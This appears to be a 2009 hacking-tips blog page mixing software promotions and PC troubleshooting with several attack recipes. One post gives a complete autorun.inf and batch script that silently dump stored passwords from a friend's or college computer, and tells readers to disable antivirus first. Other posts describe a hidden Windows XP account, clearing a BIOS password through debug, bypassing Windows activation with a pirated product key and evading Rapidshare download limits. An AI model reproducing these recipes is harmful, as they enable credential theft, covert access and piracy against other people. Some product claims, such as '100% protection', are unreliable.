Sunday, August 30, 2009

Recover Data from your Pen Drive


Pen Drive Data RecoveryPen Drive Data Recovery utility is read-only software that recovers your data from inaccessible, formatted or undetectable USB pen drive. Safest Data Recovery software recovers and restores lost or missing files and folders enabling you to get back all your important lost data.
Pen Drive Data Recovery Utility recovers files, folders, music, pictures, video, digital images, photos etc which is lost due to improper usage of drive, virus/worm attack, accidental corruption etc. Pen drive data retrieval software restore all bmp, mov, jpeg, tiff, mpeg, wav and all other files created by different application.
USB drive Pen Drive Recovery Software Retrieve data lost due to Quick Format, Damaged File System, Human Errors, Improper shutdown or any other type of software or hardware failure. This software is considered as the safest utility tool for the end user.
Features:
  • Retrieves corrupted files and folders damaged due to human error or any virus generated data loss.
  • Provides full data retrieval support both by Microsoft Windows and Apple Macintosh OSX.
  • This utility is considered as the easiest data retrieval software to restore lost data, recover formatted or damaged files before you fix and repair your corrupted storage device.
  • Support all type of memory stick including Apacer, Kingmax, Lexar, Kingston, Transcend, Nikon, Super Flash, Sony, Fujifilm, Corsair, Samsung etc.
System Requirement:
  • Pentium-class or equivalent processor
  • RAM (128 MB recommended)
  • 20 Mb of free space
To Download Full Version of this Software Click Here.

Exhaustive Guide to Batch File Programming

Hello Friends,
First of all I would like to apologize for not writing a post since 2 months. But this one is very special post. One of my good Friend and a guest writer on Desi Hacker “Premkumar S.” aka “Cybercrawler” has published an E-book on “Batch File Programming”.
Batch File Programming
Who should read this Book?
This book is for everybody from a Beginner to a Geek. Anybody who wants to become a Hacker then this is a what you need to know before even thinking to become a Hacker.
What can you get from it?
This book contains everything about Batch File Programing from beginning  to the end. I will list out the table of content of the E-book.
  • Introduction
  • Internal & External Commands
  • Run Line Commands
  • Batch Operators
  • Basic Commands
  • Environment Variables
  • Looping Statements
  • Conditional Statements
  • Commands Associated with files and folders
  • Network Troubleshooting commands
  • Code snippets
  • Virus Programming
  • Converting Batch to Executable
I know all of you are thinking about the second-last topic in the list. Yes it is about virus programing and it true that you can make your own viruses using Batch Programming. This is an Exhaustive guide from which you can get all the thing that you  need to know about Batch Programming.
Where can I get this E-Book?
There are 2 ways to access this Book:
  1. You can read it on the Popular document Publishing website www.scribd.com . Click here to read it.
  2. You can also download it and read it on your own PDF reader. Click Here to download it.

Rapid Hacker Latest Version 4.2(Final)

Rapid Hacker v4.2
This Tool Enables you to download from Rapidshare.com without any problem. What you have to do is to just paste the rapidshare.com link, then your download will start automatically. You can queue rapidshare.com links. Download will start one after another automatically. Also contains a tool for unlimited download from rapidshare.com. After Reaching The Download Limit Rapidshare Blocks You And Force You To Wait Hours / To Buy Premium Account Then you have to run the tool. Then you can again download from Rapidshare.com Even though RapidHacker, says RapidHacker, it can also be used for any other Download site. e.g Megaupload, and soforth.
New features
  • Change Resolution For better appearance, is it’s designed under 1024×768 Display
    Better Cookie Removal (Fixed some issues)
  • Restore (Now RapidHacker restores your Internet Configuration, back to its original configuration)
  • Put http://www.informationleak.net as Default for OnPageLoad, when applications executed. (neatadvertising imho for my favorite site in the whole worlds!)
  • Changed GUI to darker appearance, instead of boring Gray.
  • Added some detailed information where specified/clicked around the program.
  • Integrity Checking (To reduce the risk of it being Binded with Malware)
    Added Windows Vista Dynamic IP Renewal API
  • UI Behaviour Change
  • Fixed some bugs which interupts Spoofing process. (Only some users Affected)
  • Crawler has new Behaviour, due to Rapidshare shadowing the directories.
  • Now spoof’s behind Routers and WiFi Connections!
  • CGI Spoofing capabilities.
To Download it Click Here.

Computer Worm Consequences & Protection


A computer worm is a program which copies itself across a network.A computer worm differs from a computer virus in that a computer worm can run itself. A virus needs a host program to run, and the virus code runs as part of the host program. A computer worm can spread without a host program, although some modern computer worms also use files to hide inside.
Well known examples of the computer worm
The original computer worm was (perhaps accidentally) unleashed on the Internet by Robert Tappan Morris in 1988. The Internet Worm used sendmail, fingerd, and rsh/rexec to spread itself across the Internet.
The SQL Slammer Worm of 2003 used a vulnerability in Microsoft SQL Server 2000 to spread itself across the Internet. The Blaster Worm, also of 2003, used a vulnerability in Microsoft DCOM RPC to spread itself.
The Melissa worm of 1999, the Sobig worms of 2003 and the Mydoom worm of 2004 all spread through e-mail. These worms shared some features of a trojan horse, in that they spread by enticing a user to open an infected e-mail attachment.
Mydoom also attempted to spread itself through the peer-to-peer file sharing application KaZaA. The Mydoom worms attempted a Denial of Service (DoS) attack against SCO and Microsoft.
Protecting yourself against computer worms
Computer worms which spread through vulnerabilities in network services can best be protected against by keeping up-to-date in installing patches provided by operating system and application vendors. This includes worms like SQL Slammer and Blaster.
Computer worms which spread like trojan horses can best be defended against by not opening attachments in your e-mail. These infected attachments are not limited to .EXE files. Microsoft Word and Excel files can contain macros which spread infection.
Some people would say that the best way to protect yourself against computer worms is not to run Microsoft

Create a Hidden Account in Windows XP

Do you want to create an Account that nobody can see? Alright Today I am going to teach you how to create a Hidden Account in Windows XP.
Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further.
After you have Backed up your registry follow the Steps to Create your Hidden Account:
  • First Goto Start -> Run -> Type regedit -> Enter
  • In the Left Menu goto,
    HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList
  • In the Right pane, Right click -> New -> String Value
  • Right click on the new String Value and click Rename
  • Type the Name of the Account you want to hide.
  • Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
  • Now Save and Exit the Registry and Logoff.
  • Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt
  • Type hidden Accounts name and password
  • Enjoy!!!

How Can I Find Lost Computer Files?

Search files
The dreaded lost file syndrome: You know that somewhere on your hard drive, the file you seek is happily sitting, awaiting you. But you just can’t find it, and you can’t even remember the name of it.
Now what? If you’re a Windows user, replace the painfully slow built-in search tool with the free Windows Search from microsoft.com. The add-on can dig up e-mail messages, attachments and documents of just about any type. You can also try a third-party system, many of which are free. Google Desktop Search, for example, marries your local PC file system with the Web-based Google search system, allowing you to find virtually any kind of file, and gives results in a familiar Google display. Another option if speed is your main concern: Copernic Desktop Search, which can complete most searches in less than a second. Keep in mind that all of these tools let you search within the text of a file as well.
Mac users can try the built-in Spotlight feature, which has lots of power and hidden capabilities, including searching by type, creation date and more. Or, for $60, Leap lets you tag files so you can run complex searches (say, “Word files that talk about South Africa” or “photos that include Mary”) to track them down later.

Play Java Mobile Games On Computer


java mobile games
As we all know that the java games for mobile can not be played directly
on your computer.

Want to play java mobile games on your computer
We have came up with the solution.
The application we provide will allow you to play java games on your computer,
So we can play all the exiting java Mobile games on our computer

Also if you want to check how the java games would be after installing on the phone can be checked
So just install the software and play all the exiting games.

Live TV on your Mobile


Live TVUsing S60 application allows you to stream videos but what about T.V.
Here we have got the software 10LIVE which allow you to watch T.V. on your s60 mobile phone
10LIVE is a cell phone client software for playing audio and video, support online live television, online support feature film programming.
10LIVE support cmwap, cmnet wireless streaming media player software! 10 LIVE can be realized in low-speed networks under the condition of smooth wireless streaming video viewing experience!

Read Scratched CD using BadCopy

bad copy
Having problem with scratch cd
Computer Getting hanged when a scracth CD is inserted
Having inportant data on CD which become unreadable due to schratches
We have came up with the solution .
Use BADCOPY software which allows you to recover data from a scratch unreadable CD.
Bad Copy allows you to store the the data from CD with out your computer getting hang.
It will allow to view all the files and folders.
Just insert CD and open BAD COPY it will show you all the Content of your CD
Just select the important files and start rescue it will take some time but will then as you to save the content,just give the path and the important file will get saved.

Phone Unlock Code Generator


Phone unlock code
Forgotten your unlock code
Dont worry we have came up with the best solution for You
Just download the Phone Unlock code generator and enter the IMEI number
and the suscriber and your phone number and You will get the Unlock Code of your Mobile.
Nokia ,sony ericsson and many other company Supported

Protect your Computer from USB Virus


USB VirusHave you ever attached a USB to a computer and later found out that the Computer is infected by a virus? I have definitely faced this situation many times. If you attach your infected USB drive to the infected computer the virus is transferred to the Computer in no time infecting all the important documents. But now you don’t have to worry about any USB Virus because USB Disk Security provides 100% protection against any threats via USB drive.
USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer. This light and easy to use solution is 100% compatible with all software and doesn’t slow down your computer at all. You pay USB Disk Security once and get it all, however, other antivirus products should be paid for updates every year.

Product Highlights:
100% protection against any malicious programs via USB storage
USB Disk Security uses innovative proactive technology to block any threats via USB drive. There are relatively few products available in shops or on the Internet which offer even close to 100% protection against any malicious programs via USB drive. The majority of products are unable even to guarantee 90% protection. USB Disk Security is the world’s best software to block threats via USB drive.
The best solution to protect offline computer
Other antivirus software should update signature database regularly, and they cannot effectively protect offline computer that is not connected to the Internet. When new viruses, worms and other malicious attacks strike, traditional signatures are insufficient. Every minute one waits for a virus signature update creates a window of vulnerability that could have devastating consequences. USB Disk Security uses advanced proactive detection techniques, requires no signature updates, and closes the window of vulnerability left open by other reactive, signature-based responses.
The world’s fastest and smallest antivirus software
With USB Disk Security, it’s not necessary to sacrifice speed for detection and scanning. Compare antivirus software and you’ll discover that USB Disk Security is by far one of the smallest applications in the industry. For example, the v5.0 of USB Disk Security installer is just 1 MB. The program utilizes approximately 1 to 7 MB of RAM.
100% compatible with all software
Incompatibility between antivirus programs is an issue. In the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other’s functioning. However, USB Disk Security is 100% compatible with all software, including Windows Vista.
Simple to use
USB Disk Security has been specifically designed to perform effectively regardless of the user’s level of computer expertise. Just install and forget it.
System Requirement
100MHz Processor or more, 16MB RAM or more. The operating system should be Windows 95, Windows 98, Windows 2000, Windows XP, Windows NT 4.0, Windows ME, or Vista.
Download
http://w17.easy-share.com/1702778903.html

China Mobile Secret Codes


china mobile
The china mobile codes are very difficult to get.
As per the user demand i m posting the secret codes for china mobiles which work on all the chinese phones
Here are the codes for china mobiles try it
1)Default user code : 1122, 3344, 1234, 5678
2)Engineer mode : *#110*01#
3)Factory mode : *#987#
4)Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
5)Restore factory settings : *#987*99#
6)LCD contrast : *#369#
7)Software version : *#800#
8)Software version : *#900#
9)Set default language : *#0000# Send
10)Set English language : *#0044# Send
11)Set English language (new firmware) : *#001# Send
12)Default user code : 1122, 3344, 1234, 5678

China Mobile PC Suite & USB Drivers

pc
The chinese Phone models came with the USB cables but you can only use it as Mass Storage Device
The Second option of COMPORT is of no use untill you have the PC suite and the USB drivers.
PC sync Manager is the PC suite which works fine with all the chinese Phone models.
Basic features of PC sync Manager
1)Download Java to mobile Phone
2)Copy your phone book
3)Copy your SMS
4)Use your phone as modem
How to use PC Sync manager
*First download the PC sync manager and usb drivers
*install pc sync manager
*connect your mobile phone and select option COMPORT in your mobile
*Install the drivers from My Computer rightclick->properties->hardware->balloon on Comport->install drivers
*Select appropriate Comport from the PC sync Manager and enjoy
Download Pc Suite & drivers

Unlock Yahoo when Account is Blocked


YahooThis is a very easy but an awesome Trick. When you or someone else enters an incorrect login multiple times then Yahoo! locks the account for “security reasons” and you are unable to access your chat names. Cool thing is that, these are a piece of cake to unlock.
All you need is a list of Yahoo servers to log in with. Every time you login, you are using what’s called a server to access yahoo. You login with a cookie, which is sort of like an information packet or ID proving that you are who you claim to be, and the account is yours.
When people attempt to log your name in multiple times with a locking tool, all they are doing is logging in over and over with an incorrect password until your cookie expires, which means you will no longer be allowed to login. So, when you find yourself locked, what you need to do is refresh your cookie. But how can you do that when the yahoo server you were using has blocked you?
Simple, find another server. Yahoo has servers all over the place. There are more than I’d care to count. I’ll include a pretty decent sized list with this tutorials. All you have to do is paste one of these servers in your browser and log in on the page you see. Unless you have been locked on that server as well, you will receive a fresh cookie and will be able to log in to messenger again.
Tons of people try to go through their email and login there to unlock an account, but a smart locker will shut down your mail server first, then cut off your chat server. Most people don’t know what to do if the email is blocked, so they give up trying. That’s why I don’t even bother with the email method. I simply pick another server, log in, and I’m good to go. There are so many servers out there that it is impossible to lock them all. Even if they could, the lock is only for about 12 hours, and then you’re back in business.
Some Yahoo Servers :
Yahoo Chat Logins :
http://hk.chat.yahoo.com/?myHome HK
http://tw.chat.yahoo.com/?myHome Taiwan
http://in.chat.yahoo.com/?myHome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?myHome Singapore
http://chinese.chat.yahoo.com/?myHome Chinese
http://cn.chat.yahoo.com/?myHome China
http://asia.chat.yahoo.com/?myHome Asia
http://au.chat.yahoo.com/?myHome Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/chatbylycos.html France
http://de.docs.yahoo.com/chat/chatbylycos.html Germany
http://it.docs.yahoo.com/chat/chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat/chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?myHome Argentina
http://br.chat.yahoo.com/?myHome Brazil
http://espanol.chat.yahoo.com/?myHome South America
http://mx.chat.yahoo.com/?myHome Mexico
http://ca.chat.yahoo.com/?myHome Canada
http://world.yahoo.com/ World of yahoo
Cheers and Keep learning.

How to Become a Hacker?

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in the same situation, then this is the right place for you.
Every day I get a lot of emails where people ask me- How to Become a Hacker?. In fact this question is not easy to answer because, hacking is not an art that can be mastered overnight. It requires knowledge, skills, creativity, dedication and of course TIME. Everyone can become a Hacker provided they learn it from the basics. So if you wanna become a hacker, then all you need is a good source that will teach you hacking from the basics.
What skill do I need to Become a Hacker?
There is no magic to become a  Hacker, but like anything else that is worthwhile it takes dedication, a willingness to learn. It is most important to have a good knowledge of topics such as Operating system and it’s working, Computer networks, Computer security and of course Programming. It’s not possible to become a hacker overnight. All you need is a good source (book) to start learn Hacking from the basics.
What is the best way to Learn Hacking?
The best way to become a Hacker is to start from the basics. You have to master the basics to build a strong foundation. And once this is done you’ll be in a position to explore new ideas and start thinking like a Hacker. 
There exists tons of books on the market that teach you Hacking but unfortunately, it requires a set of pre-established skills and knowledge to understand the concepts explained in the book. Also these books are not meant the for beginners who doesn’t know anything about hacking. I have found an excellent Hacking Book for Beginners. This book is the first step to fulfil your dream to become a Hacker. Yes, this is the right book for the beginners who are interested to learn hacking from the basics. The good thing about this book is, any one can understand the concepts presented in the book without the need for any prior knowledge. The book is called

The Hacker’s Underground Handbook

NOTE: I have found that some of my readers have mistaken the book to be the Hacker’s Handbook which is widely available on the internet. But this book is called The Hacker’s Underground Handbook. The Hacker’s Underground Handbook is unique and is not available anywhere on the internet. So please don’t be confused. The Hacker’s Underground Handook  and Hacker’s Handbook are different.
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything is presented in a simple and effective manner. It’s a greak book for the beginner who want to become a Hacker. This book will install a Hacker’s Mindset on you.
The following skills are uncovered in this book
1. You will learn all the hackers underground tricks and learn to apply them in real world situations.
2. You will be put into a hackers mindset and learn to think like a Hacker.
3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
4. You will acquire knowledge nonexistent to 99.9% of the people in the world!
5. This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.
This book is of great value for all those who have a dream to become a Hacker.
So, what are you waiting for? Go Download your copy of the book which from the following link 

Cracking Passwords using a USB

USB Password Hack                                         Hello Friends,
Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedure to create the password hacking toolkit.
NOTE: You must temporarily disable your Anti-Virus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad as autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad as launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC  or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista.
Disclaimer: I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords.

Making Windows Genuine


1 . start > run > ” regedit” (without the quotes of course)
2 . Go to the key:
    HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WindowsNT\ CurrentVersion\WPAEvents\OOBETimer …and doubleclick on it. Then change some of the value data to ANYTHING ELSE…delete some, add some letters, ..just change it! now close out regedit.
3 . Go to start > run > “%systemroot%\system32\oobe\msoobe.exe /a” (again, don’t type the quotes)
[eminimall]
4 . The activation screen will come up, click on register over telephone,>next> then click on CHANGE PRODUCT KEY, enter in this key:
JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ and give update.
(Now automatically window will return back to activate by telephone mode and ask for activation code,just ignore and exit that window it’s done)

Increase Dial up Download speed

Dial up Download speed is low and some time it can be unused for advanced user so to improve Dial up Download speed following registry editing is helpfull.
1. Direct in Regedit :
Open
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ Tcpip\Parameters
Edit as follows:
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c
OR
[eminimall]
2. By .Reg file :
Open notepad & paste
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c
>> Now save this file as speed.reg (in Windows). Execute it and observe the change!

10 reasons why PCs crash U must Know

Fatal error: The system has become unstable or is busy,” it says. “Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications.”
You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.
For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.
If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:
* Start-Settings-Control Panel-System-Device Manager.
Often if a device has a problem a yellow ‘!’ appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.
Sometimes a device might share an IRQ with something described as ‘IRQ holder for PCI steering’. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.
Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).
When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.
To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.
But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.
One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.
Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.
EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.
Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.
A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer’s display.
Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to ‘yes’ to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to
* Start-Programs-Accessories-System Tools-Disk Defragmenter
This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.
The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).
Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to
* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.
Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.
Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to
* Start-Programs-Accessories-System Tools-ScanDisk
Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.
[eminimall]

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.
These can often be resolved easily by reducing the resolution of the video display. Go to
* Start-Settings-Control Panel-Display-Settings
Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.
If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to
* Start-Settings-Control Panel-System-Device Manager
Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.
If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.
The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.
Another useful way to resolve video problems is to go to
* Start-Settings-Control Panel-System-Performance-Graphics
Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).
Look up your video card’s manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to
* Start-Settings-Control Panel-Add/Remove Programs
Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.
A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.
An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.
Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer’s performance.
If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer’s default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.
The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use RegistryBooster by Uniblue to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.
Read the instructions and use it carefully so you don’t do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from http://www.registrybooster.com/
Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message “Starting Windows” press F4. This should take you into Safe Mode.
Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.
Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn’t work.
Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.
One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com
CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.
If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.
It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Here is the Best way to Crack the BIOS password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
[eminimall]
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
EnjoYYYYYYYYYY
PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….

20 Great Google Secrets

Google is clearly the best general-purpose search engine on the Web
But most people don’t use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number.
But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google’s search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of Google’s lesser-known options.
Syntax Search Tricks
Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at:
www.google.com/help/operators.html
Here are some advanced operators that can help narrow down your search results.
